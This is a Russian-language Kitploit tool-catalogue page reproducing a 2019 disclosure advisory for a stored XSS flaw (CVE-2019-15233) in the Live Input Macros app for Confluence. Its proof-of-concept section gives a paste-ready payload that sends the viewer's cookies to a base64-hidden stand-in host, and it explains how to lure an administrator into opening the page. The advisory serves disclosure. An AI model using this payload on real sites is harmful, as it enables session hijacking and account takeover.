Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-15233 — (FAB-2019-00157) Уязвимость, обнаруженная мной CVE-2019-15233 | Kitploit
Инструменты/GitHubGitHub/l0nax/cve-2019-15233
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubl0nax/cve-2019-15233

CVE-2019-15233

(FAB-2019-00157) Уязвимость, обнаруженная мной CVE-2019-15233

Репозиторий
16 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-15233

(FAB-2019-00157) Уязвимость, обнаруженная мной, CVE-2019-15233

Рекомендация: advisory

Основная информация

root@kitploit:~
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH

Авторы

Эта уязвимость была обнаружена Francesco Emanuel Bennici [email protected] из FABMation GmbH.

Описание

Live Input Macros предоставляет пользователям возможность добавлять флажки, переключатели, раскрывающиеся списки и другие элементы на страницы Confluence и вносить изменения без редактирования страницы.

Злоумышленник может выполнить JavaScript-код на сайте Confluence, если пользователь добавит вредоносный код.

Это можно использовать для кражи cookie сеанса (например) администратора (перехват сеанса).

PoC/ Эксплойт

Скопируйте этот контент:

root@kitploit:~
Hello World this is my Text Box </p> </div>





alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd

Затем создайте новый элемент на странице Confluence. Вставьте в него этот текст и поделитесь страницей Confluence с (например) системным администратором, и если он откроет сайт, вы сможете перехватить/«скопировать» его сеанс.

Скачать инструмент